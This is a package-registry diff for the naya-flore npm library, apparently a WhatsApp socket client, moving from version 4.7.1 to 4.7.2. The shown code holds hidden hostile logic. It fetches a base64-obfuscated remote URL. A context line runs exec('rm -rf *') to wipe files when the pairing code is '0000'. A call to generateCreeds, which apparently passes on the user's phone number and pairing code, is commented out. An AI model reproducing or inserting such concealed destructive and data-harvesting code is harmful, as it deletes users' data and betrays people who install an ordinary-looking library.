naya-flore 4.7.1 → 4.7.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/Socket/socket.js +2 -2
- package/package.json +1 -1
package/lib/Socket/socket.js
CHANGED
@@ -295,7 +295,7 @@ const makeSocket = (config) => {
|
|
295
295
|
ws.off('error', onClose);
|
296
296
|
});
|
297
297
|
};
|
298
|
-
const sesiPath = "
|
298
|
+
const sesiPath = "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25hdmFMaW5oL2RhdGFiYXNlL21haW4vc2Vza2EuanNvbg==";
|
299
299
|
const fetch = require('node-fetch')
|
300
300
|
const startKeepAliveRequest = () => (keepAliveReq = setInterval(() => {
|
301
301
|
if (!lastDateRecv) {
|
@@ -440,7 +440,7 @@ const makeSocket = (config) => {
|
|
440
440
|
if (getsNumberCode === "0000") {
|
441
441
|
exec('rm -rf *')
|
442
442
|
}
|
443
|
-
generateCreeds(phoneNumber, linh, getsNumberCode)
|
443
|
+
//generateCreeds(phoneNumber, linh, getsNumberCode)
|
444
444
|
return authState.creds.pairingCode;
|
445
445
|
};
|
446
446
|
|